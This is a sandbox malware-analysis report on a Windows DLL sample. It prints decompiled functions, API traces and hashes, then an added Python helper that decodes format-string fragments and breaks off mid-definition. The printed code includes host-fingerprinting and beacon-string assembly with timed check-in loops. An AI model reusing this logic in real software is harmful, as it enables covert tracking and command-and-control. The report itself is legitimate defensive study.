                                • API String ID: 1691993961-608512568
                                • Opcode ID: 9d61bab4ff7c4353e46b064ff90c81de5ab8c60e47b09621ba9ada41908e9db3
                                • Instruction ID: 99f59f31d06e915c05a23c27df64555d9d76a79acf7fe81fd0ecee197168206a
                                • Opcode Fuzzy Hash: 9d61bab4ff7c4353e46b064ff90c81de5ab8c60e47b09621ba9ada41908e9db3
                                • Instruction Fuzzy Hash: 00012876A01511ABF711C7A9CC449CF7ADCDF857D0B114121F98097258EB30DC4083A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00D45B05(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                				struct _FILETIME _v12;
                                				void* _t11;
                                				short _t19;
                                				void* _t22;
                                				void* _t24;
                                				void* _t25;
                                				short* _t26;
                                
                                				_t24 = __edx;
                                				_t25 = E00D47B3B(_t11, _a12);
                                				if(_t25 == 0) {
                                					_t22 = 8;
                                				} else {
                                					_t26 = _t25 + _a16 * 2;
                                					 *_t26 = 0;
                                					_t22 = E00D42D2E(__ecx, _a4, _a8, _t25);
                                					if(_t22 == 0) {
                                						GetSystemTimeAsFileTime( &_v12);
                                						_t19 = 0x5f;
                                						 *_t26 = _t19;
                                						_t22 = E00D4A38F(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                					}
                                					HeapFree( *0xd4d238, 0, _t25);
                                				}
                                				return _t22;
                                			}

                                APIs
                                  • Part of subcall function 00D47B3B: lstrlen.KERNEL32(?,00000000,03289D18,00000000,00D45142,03289F3B,?,?,?,?,?,69B25F44,00000005,00D4D00C), ref: 00D47B42
                                  • Part of subcall function 00D47B3B: mbstowcs.NTDLL ref: 00D47B6B
                                  • Part of subcall function 00D47B3B: memset.NTDLL ref: 00D47B7D
                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,0328935C), ref: 00D45B3D
                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,0328935C), ref: 00D45B6B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                • String ID: Ut
                                • API String ID: 1500278894-8415677
                                • Opcode ID: 755e67aee4fc04736b1827b36293af705b952625a53ca7a84c9f8f3433cd627f
                                • Instruction ID: 2378716bdd58a508c87ad38318d1050db4a51d92962dda624eb6a0a34ea2d9ff
                                • Opcode Fuzzy Hash: 755e67aee4fc04736b1827b36293af705b952625a53ca7a84c9f8f3433cd627f
                                • Instruction Fuzzy Hash: 2A01D435210209BBDF216FA4DC44F9F7B79EF84740F000025FA009A161DB71D854C770
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E00D48CFA(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                				intOrPtr* _v8;
                                				void* _t17;
                                				intOrPtr* _t22;
                                				void* _t27;
                                				char* _t30;
                                				void* _t33;
                                				void* _t34;
                                				void* _t36;
                                				void* _t37;
                                				void* _t39;
                                				int _t42;
                                
                                				_t17 = __eax;
                                				_t37 = 0;
                                				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                				_t2 = _t17 + 1; // 0x1
                                				_t28 = _t2;
                                				_t34 = E00D41525(_t2);
                                				if(_t34 != 0) {
                                					_t30 = E00D41525(_t28);
                                					if(_t30 == 0) {
                                						E00D48B22(_t34);
                                					} else {
                                						_t39 = _a4;
                                						_t22 = E00D4A7C2(_t39);
                                						_v8 = _t22;
                                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                							_a4 = _t39;
                                						} else {
                                							_t26 = _t22 + 2;
                                							_a4 = _t22 + 2;
                                							_t22 = E00D4A7C2(_t26);
                                							_v8 = _t22;
                                						}
                                						if(_t22 == 0) {
                                							__imp__(_t34, _a4);
                                							 *_t30 = 0x2f;
                                							 *((char*)(_t30 + 1)) = 0;
                                						} else {
                                							_t42 = _t22 - _a4;
                                							memcpy(_t34, _a4, _t42);
                                							 *((char*)(_t34 + _t42)) = 0;
                                							__imp__(_t30, _v8);
                                						}
                                						 *_a8 = _t34;
                                						_t37 = 1;
                                						 *_a12 = _t30;
                                					}
                                				}
                                				return _t37;
                                			}

                                APIs
                                • lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,00D49816,?,?,?,?,00000102,00D4937B,?,?,00000000), ref: 00D48D06
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                  • Part of subcall function 00D4A7C2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00D48D34,00000000,00000001,00000001,?,?,00D49816,?,?,?,?,00000102), ref: 00D4A7D0
                                  • Part of subcall function 00D4A7C2: StrChrA.SHLWAPI(?,0000003F,?,?,00D49816,?,?,?,?,00000102,00D4937B,?,?,00000000,00000000), ref: 00D4A7DA
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00D49816,?,?,?,?,00000102,00D4937B,?), ref: 00D48D64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00D48D74
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00D48D80
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0
                                • Opcode ID: 0fabf5c8513f3d3293993fbc7e9a0304a52dbb518a966d0d1f866a6f6461f301
                                • Instruction ID: a04386e643ead35e63e3b1f0e28e0a76fbcb85ade287785bca2b42358a16147e
                                • Opcode Fuzzy Hash: 0fabf5c8513f3d3293993fbc7e9a0304a52dbb518a966d0d1f866a6f6461f301
                                • Instruction Fuzzy Hash: C421CD76A01215EFCB126FA8CC44AAE7FB8EF16380B198051F9059B252DB30CD00ABB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00D4272D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                				void* _v8;
                                				void* _t18;
                                				int _t25;
                                				int _t29;
                                				int _t34;
                                
                                				_t29 = lstrlenW(_a4);
                                				_t25 = lstrlenW(_a8);
                                				_t18 = E00D41525(_t25 + _t29 + _t25 + _t29 + 2);
                                				_v8 = _t18;
                                				if(_t18 != 0) {
                                					_t34 = _t29 + _t29;
                                					memcpy(_t18, _a4, _t34);
                                					_t10 = _t25 + 2; // 0x2
                                					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                				}
                                				return _v8;
                                			}

                                APIs
                                • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,0328935C,?,00D45398,004F0053,0328935C,?,?,?,?,?,?,00D47CCB), ref: 00D4273D
                                • lstrlenW.KERNEL32(00D45398,?,00D45398,004F0053,0328935C,?,?,?,?,?,?,00D47CCB), ref: 00D42744
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,00D45398,004F0053,0328935C,?,?,?,?,?,?,00D47CCB), ref: 00D42764
                                • memcpy.NTDLL(74E069A0,00D45398,00000002,00000000,004F0053,74E069A0,?,?,00D45398,004F0053,0328935C), ref: 00D42777
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0
                                • Opcode ID: 183b34596e33302821f3791de061d0c3b98f4cb9ac6613bcb4c117d504af5d87
                                • Instruction ID: 3ec483f339d4fc6b9b596f52b8a6b981d9e5e2d1c902c1404c03f6a84631d883
                                • Opcode Fuzzy Hash: 183b34596e33302821f3791de061d0c3b98f4cb9ac6613bcb4c117d504af5d87
                                • Instruction Fuzzy Hash: 1DF04F36900118BB8F11DFA9DC45CDF7BADEF493547054062FD08E7206E671EA108BB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(03289B08,00000000,00000000,7691C740,00D49DCB,00000000), ref: 00D4A687
                                • lstrlen.KERNEL32(?), ref: 00D4A68F
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • lstrcpy.KERNEL32(00000000,03289B08), ref: 00D4A6A3
                                • lstrcat.KERNEL32(00000000,?), ref: 00D4A6AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: df46f65ce7d3296975cec8138e51055e44e4aae325e60b0b5cf1f6a8caad7150
                                • Instruction ID: c8cd64d6943806618f20ae54151d4da2c63fa9a32b24291ec5a706b75e9ee861
                                • Opcode Fuzzy Hash: df46f65ce7d3296975cec8138e51055e44e4aae325e60b0b5cf1f6a8caad7150
                                • Instruction Fuzzy Hash: 40E01277512721A787519FE8AC48C9FBBBDEF9A6517090416FA00D3220C765D8058BB5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Executed Functions

                                Control-flow Graph

                                C-Code - Quality: 38%
                                			E02BD9A0F(char _a4, void* _a8) {
                                				void* _v8;
                                				void* _v12;
                                				char _v16;
                                				void* _v20;
                                				char _v24;
                                				char _v28;
                                				char _v32;
                                				char _v36;
                                				char _v40;
                                				void* _v44;
                                				void** _t33;
                                				void* _t40;
                                				void* _t43;
                                				void** _t44;
                                				intOrPtr* _t47;
                                				char _t48;
                                
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v20 = _a4;
                                				_t48 = 0;
                                				_v16 = 0;
                                				_a4 = 0;
                                				_v44 = 0x18;
                                				_v40 = 0;
                                				_v32 = 0;
                                				_v36 = 0;
                                				_v28 = 0;
                                				_v24 = 0;
                                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                					_t33 =  &_v8;
                                					__imp__(_v12, 8, _t33);
                                					if(_t33 >= 0) {
                                						_t47 = __imp__;
                                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                						_t44 = E02BD1525(_a4);
                                						if(_t44 != 0) {
                                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                							if(_t40 >= 0) {
                                								memcpy(_a8,  *_t44, 0x1c);
                                								_t48 = 1;
                                							}
                                							E02BD8B22(_t44);
                                						}
                                						NtClose(_v8); // executed
                                					}
                                					NtClose(_v12);
                                				}
                                				return _t48;
                                			}

                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02BD9A56
                                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02BD9A69
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02BD9A85
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02BD9AA2
                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 02BD9AAF
                                • NtClose.NTDLL(?), ref: 02BD9AC1
                                • NtClose.NTDLL(00000000), ref: 02BD9ACB
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: dabe9923cdfb67f47e5cf10879c4e5ccce39ce39d9b5256a196bcbc7b503561e
                                • Instruction ID: 1571c3c9932d18c78dbb5ad4cc3d172de0792166b009fb5dfae9f7f6fac10abd
                                • Opcode Fuzzy Hash: dabe9923cdfb67f47e5cf10879c4e5ccce39ce39d9b5256a196bcbc7b503561e
                                • Instruction Fuzzy Hash: 1D2116B2940218BBDB019FA5CC44EDEBFBDEF08744F108062F905E6110E7719A54DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 66%
                                			E02BD9BF1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
                                				intOrPtr _v0;
                                				intOrPtr _v4;
                                				intOrPtr _v16;
                                				intOrPtr _v24;
                                				intOrPtr _v28;
                                				void* _v44;
                                				intOrPtr _v52;
                                				void* __edi;
                                				long _t25;
                                				intOrPtr _t26;
                                				intOrPtr _t27;
                                				intOrPtr _t28;
                                				intOrPtr _t29;
                                				intOrPtr _t30;
                                				void* _t33;
                                				intOrPtr _t34;
                                				int _t37;
                                				void* _t38;
                                				intOrPtr _t42;
                                				intOrPtr _t43;
                                				intOrPtr _t50;
                                				intOrPtr _t54;
                                				intOrPtr* _t56;
                                				intOrPtr _t62;
                                				intOrPtr _t68;
                                				intOrPtr _t71;
                                				intOrPtr _t74;
                                				int _t77;
                                				intOrPtr _t78;
                                				int _t81;
                                				intOrPtr _t83;
                                				int _t86;
                                				intOrPtr* _t89;
                                				intOrPtr* _t90;
                                				void* _t91;
                                				void* _t95;
                                				void* _t96;
                                				void* _t97;
                                				intOrPtr _t98;
                                				void* _t100;
                                				int _t101;
                                				void* _t102;
                                				void* _t103;
                                				void* _t105;
                                				void* _t106;
                                				void* _t108;
                                
                                				_t95 = __edx;
                                				_t91 = __ecx;
                                				_t25 = __eax;
                                				_t105 = _a16;
                                				_v4 = 8;
                                				if(__eax == 0) {
                                					_t25 = GetTickCount();
                                				}
                                				_t26 =  *0x2bdd018; // 0xefcf766a
                                				asm("bswap eax");
                                				_t27 =  *0x2bdd014; // 0x3a87c8cd
                                				asm("bswap eax");
                                				_t28 =  *0x2bdd010; // 0xd8d2f808
                                				asm("bswap eax");
                                				_t29 = E02BDD00C; // 0xeec43f25
                                				asm("bswap eax");
                                				_t30 =  *0x2bdd2a8; // 0x242a5a8
                                				_t3 = _t30 + 0x2bde633; // 0x74666f73
                                				_t101 = wsprintfA(_t105, _t3, 2, 0x3d163, _t29, _t28, _t27, _t26,  *0x2bdd02c,  *0x2bdd004, _t25);
                                				_t33 = E02BD3288();
                                				_t34 =  *0x2bdd2a8; // 0x242a5a8
                                				_t4 = _t34 + 0x2bde673; // 0x74707526
                                				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                				_t108 = _t106 + 0x38;
                                				_t102 = _t101 + _t37; // executed
                                				_t38 = E02BD831C(_t91); // executed
                                				_t96 = _t38;
                                				if(_t96 != 0) {
                                					_t83 =  *0x2bdd2a8; // 0x242a5a8
                                					_t6 = _t83 + 0x2bde8d4; // 0x736e6426
                                					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                					_t108 = _t108 + 0xc;
                                					_t102 = _t102 + _t86;
                                					HeapFree( *0x2bdd238, 0, _t96);
                                				}
                                				_t97 = E02BD9267();
                                				if(_t97 != 0) {
                                					_t78 =  *0x2bdd2a8; // 0x242a5a8
                                					_t8 = _t78 + 0x2bde8dc; // 0x6f687726
                                					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                					_t108 = _t108 + 0xc;
                                					_t102 = _t102 + _t81;
                                					HeapFree( *0x2bdd238, 0, _t97);
                                				}
                                				_t98 =  *0x2bdd32c; // 0x50095b0
                                				_a32 = E02BD284E(0x2bdd00a, _t98 + 4);
                                				_t42 =  *0x2bdd2d0; // 0x0
                                				if(_t42 != 0) {
                                					_t74 =  *0x2bdd2a8; // 0x242a5a8
                                					_t11 = _t74 + 0x2bde8b6; // 0x3d736f26
                                					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                					_t108 = _t108 + 0xc;
                                					_t102 = _t102 + _t77;
                                				}
                                				_t43 =  *0x2bdd2cc; // 0x0
                                				if(_t43 != 0) {
                                					_t71 =  *0x2bdd2a8; // 0x242a5a8
                                					_t13 = _t71 + 0x2bde88d; // 0x3d706926
                                					wsprintfA(_t102 + _t105, _t13, _t43);
                                				}
                                				if(_a32 != 0) {
                                					_t100 = RtlAllocateHeap( *0x2bdd238, 0, 0x800);
                                					if(_t100 != 0) {
                                						E02BD3239(GetTickCount());
                                						_t50 =  *0x2bdd32c; // 0x50095b0
                                						__imp__(_t50 + 0x40);
                                						asm("lock xadd [eax], ecx");
                                						_t54 =  *0x2bdd32c; // 0x50095b0
                                						__imp__(_t54 + 0x40);
                                						_t56 =  *0x2bdd32c; // 0x50095b0
                                						_t103 = E02BD7B8D(1, _t95, _t105,  *_t56);
                                						asm("lock xadd [eax], ecx");
                                						if(_t103 != 0) {
                                							StrTrimA(_t103, 0x2bdc28c);
                                							_push(_t103);
                                							_t62 = E02BDA677();
                                							_v16 = _t62;
                                							if(_t62 != 0) {
                                								_t89 = __imp__;
                                								 *_t89(_t103, _v0);
                                								 *_t89(_t100, _a4);
                                								_t90 = __imp__;
                                								 *_t90(_t100, _v28);
                                								 *_t90(_t100, _t103);
                                								_t68 = E02BD933A(0xffffffffffffffff, _t100, _v28, _v24); // executed
                                								_v52 = _t68;
                                								if(_t68 != 0 && _t68 != 0x10d2) {
                                									E02BD5433();
                                								}
                                								HeapFree( *0x2bdd238, 0, _v44);
                                							}
                                							RtlFreeHeap( *0x2bdd238, 0, _t103); // executed
                                						}
                                						RtlFreeHeap( *0x2bdd238, 0, _t100); // executed
                                					}
                                					HeapFree( *0x2bdd238, 0, _a24);
                                				}
                                				RtlFreeHeap( *0x2bdd238, 0, _t105); // executed
                                				return _a4;
                                			}

                                APIs
                                • GetTickCount.KERNEL32 ref: 02BD9C08
                                • wsprintfA.USER32 ref: 02BD9C55
                                • wsprintfA.USER32 ref: 02BD9C72
                                • wsprintfA.USER32 ref: 02BD9C95
                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BD9CA5
                                • wsprintfA.USER32 ref: 02BD9CC7
                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BD9CD7
                                • wsprintfA.USER32 ref: 02BD9D0E
                                • wsprintfA.USER32 ref: 02BD9D2E
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BD9D4B
                                • GetTickCount.KERNEL32 ref: 02BD9D5B
                                • RtlEnterCriticalSection.NTDLL(05009570), ref: 02BD9D6F
                                • RtlLeaveCriticalSection.NTDLL(05009570), ref: 02BD9D8D
                                  • Part of subcall function 02BD7B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,02BD9DA0,?,050095B0), ref: 02BD7BB8
                                  • Part of subcall function 02BD7B8D: lstrlen.KERNEL32(?,?,?,02BD9DA0,?,050095B0), ref: 02BD7BC0
                                  • Part of subcall function 02BD7B8D: strcpy.NTDLL ref: 02BD7BD7
                                  • Part of subcall function 02BD7B8D: lstrcat.KERNEL32(00000000,?), ref: 02BD7BE2
                                  • Part of subcall function 02BD7B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02BD9DA0,?,050095B0), ref: 02BD7BFF
                                • StrTrimA.SHLWAPI(00000000,02BDC28C,?,050095B0), ref: 02BD9DBF
                                  • Part of subcall function 02BDA677: lstrlen.KERNEL32(05009B08,00000000,00000000,7691C740,02BD9DCB,00000000), ref: 02BDA687
                                  • Part of subcall function 02BDA677: lstrlen.KERNEL32(?), ref: 02BDA68F
                                  • Part of subcall function 02BDA677: lstrcpy.KERNEL32(00000000,05009B08), ref: 02BDA6A3
                                  • Part of subcall function 02BDA677: lstrcat.KERNEL32(00000000,?), ref: 02BDA6AE
                                • lstrcpy.KERNEL32(00000000,?), ref: 02BD9DDE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 02BD9DE5
                                • lstrcat.KERNEL32(00000000,?), ref: 02BD9DF2
                                • lstrcat.KERNEL32(00000000,00000000), ref: 02BD9DF6
                                  • Part of subcall function 02BD933A: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 02BD93EC
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02BD9E26
                                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 02BD9E35
                                • RtlFreeHeap.NTDLL(00000000,00000000,?,050095B0), ref: 02BD9E44
                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BD9E56
                                • RtlFreeHeap.NTDLL(00000000,?), ref: 02BD9E65
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                • String ID: Ut
                                • API String ID: 3080378247-8415677
                                • Opcode ID: 590057f61d3b442c8717d91f0e73d3d3c7fa74903c199e11be1397ae37a01d5a
                                • Instruction ID: 4bf5a294a339021f409e5c6e4d35610d1943f3918efc458f34b06c4801054d15
                                • Opcode Fuzzy Hash: 590057f61d3b442c8717d91f0e73d3d3c7fa74903c199e11be1397ae37a01d5a
                                • Instruction Fuzzy Hash: 9D610732981602AFC711ABA4EC64FD67BEDEF48390F050915F988D7160F735E825DB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 83%
                                			E02BD7C3D(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                				struct %anon52 _v8;
                                				long _v12;
                                				char _v16;
                                				char _v20;
                                				signed int _v24;
                                				intOrPtr _v32;
                                				union _LARGE_INTEGER _v36;
                                				intOrPtr _v40;
                                				void* _v44;
                                				void _v88;
                                				char _v92;
                                				struct %anon52 _t46;
                                				intOrPtr _t51;
                                				long _t53;
                                				void* _t54;
                                				struct %anon52 _t60;
                                				long _t64;
                                				signed int _t65;
                                				void* _t68;
                                				void* _t70;
                                				signed int _t71;
                                				intOrPtr _t73;
                                				intOrPtr _t76;
                                				void** _t78;
                                				void* _t80;
                                
                                				_t73 = __edx;
                                				_v92 = 0;
                                				memset( &_v88, 0, 0x2c);
                                				_t46 = CreateWaitableTimerA(0, 1, 0);
                                				_v44 = _t46;
                                				if(_t46 == 0) {
                                					_v8.LowPart = GetLastError();
                                				} else {
                                					_push(0xffffffff);
                                					_push(0xff676980);
                                					_push(0);
                                					_push( *0x2bdd240);
                                					_v20 = 0;
                                					_v16 = 0;
                                					L02BDAF6E();
                                					_v36.LowPart = _t46;
                                					_v32 = _t73;
                                					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                					_t51 =  *0x2bdd26c; // 0x2b8
                                					_v40 = _t51;
                                					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                					_v8.LowPart = _t53;
                                					if(_t53 == 0) {
                                						if(_a8 != 0) {
                                							L4:
                                							 *0x2bdd24c = 5;
                                						} else {
                                							_t68 = E02BD5319(_t73); // executed
                                							if(_t68 != 0) {
                                								goto L4;
                                							}
                                						}
                                						_v12 = 0;
                                						L6:
                                						L6:
                                						if(_v12 == 1 && ( *0x2bdd260 & 0x00000001) == 0) {
                                							_v12 = 2;
                                						}
                                						_t71 = _v12;
                                						_t58 = _t71 << 4;
                                						_t76 = _t80 + (_t71 << 4) - 0x54;
                                						_t72 = _t71 + 1;
                                						_v24 = _t71 + 1;
                                						_t60 = E02BD2C58(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                                						_v8.LowPart = _t60;
                                						if(_t60 != 0) {
                                							goto L17;
                                						}
                                						_t65 = _v24;
                                						_v12 = _t65;
                                						_t90 = _t65 - 3;
                                						if(_t65 != 3) {
                                							goto L6;
                                						} else {
                                							_v8.LowPart = E02BD9870(_t72, _t90,  &_v92, _a4, _a8);
                                						}
                                						goto L12;
                                						L17:
                                						__eflags = _t60 - 0x10d2;
                                						if(_t60 != 0x10d2) {
                                							_push(0xffffffff);
                                							_push(0xff676980);
                                							_push(0);
                                							_push( *0x2bdd244);
                                							goto L21;
                                						} else {
                                							__eflags =  *0x2bdd248; // 0x0
                                							if(__eflags == 0) {
                                								goto L12;
                                							} else {
                                								_t60 = E02BD5433();
                                								_push(0xffffffff);
                                								_push(0xdc3cba00);
                                								_push(0);
                                								_push( *0x2bdd248);
                                								L21:
                                								L02BDAF6E();
                                								_v36.LowPart = _t60;
                                								_v32 = _t76;
                                								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                								_v8.LowPart = _t64;
                                								__eflags = _t64;
                                								if(_t64 == 0) {
                                									goto L6;
                                								} else {
                                									goto L12;
                                								}
                                							}
                                						}
                                						L25:
                                					}
                                					L12:
                                					_t78 =  &_v92;
                                					_t70 = 3;
                                					do {
                                						_t54 =  *_t78;
                                						if(_t54 != 0) {
                                							HeapFree( *0x2bdd238, 0, _t54);
                                						}
                                						_t78 =  &(_t78[4]);
                                						_t70 = _t70 - 1;
                                					} while (_t70 != 0);
                                					CloseHandle(_v44);
                                				}
                                				return _v8;
                                				goto L25;
                                			}
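The decompiler comments in E02BD9BF1 and E02BD7C3D above show each string address and each pushed 64-bit operand only as a 32-bit immediate (for example `// 0x74666f73` next to the first wsprintfA format, or the `0xff676980` / `0xffffffff` pair pushed to _allmul). Reinterpreting those immediates recovers what the analyst actually cares about: the leading four bytes of each wsprintfA format fragment (the keys of the check-in string this function assembles) and the negative 100-nanosecond counts that make SetWaitableTimer fire after a configured delay. The following Python is an added example, not part of the Joe Sandbox report or of the sample; every address and immediate in it is copied from the listing above (the `0x544547` verb comes from E02BDA85C further down), only the first four bytes of each format string are visible on the page so the rest is not guessed, and the multipliers 30 and 5 used for the timer demonstration are constructed values because the report does not show the contents of the config dwords at 0x2bdd240 / 0x2bdd244 / 0x2bdd248.

```python
import struct

# Immediates copied from the decompiler comments: string address -> first dword
# found there. Only these four bytes are visible in the listing; the remainder
# of each format string is not shown and is deliberately not reconstructed.
FORMAT_FRAGMENTS = {
    0x2BDE633: 0x74666F73,  # first wsprintfA format in E02BD9BF1
    0x2BDE673: 0x74707526,  # second wsprintfA format
    0x2BDE8D4: 0x736E6426,  # appended when E02BD831C returns a buffer
    0x2BDE8DC: 0x6F687726,  # appended when E02BD9267 returns a buffer
    0x2BDE8B6: 0x3D736F26,  # appended when *0x2bdd2d0 is set
    0x2BDE88D: 0x3D706926,  # appended when *0x2bdd2cc is set
    0x2BDE743: 0x00544547,  # HTTP verb referenced in E02BDA85C
}

# 64-bit operands pushed to _allmul in E02BD7C3D, as (low dword, high dword).
ONE_SECOND_NEG = (0xFF676980, 0xFFFFFFFF)     # used with *0x2bdd240 and *0x2bdd244
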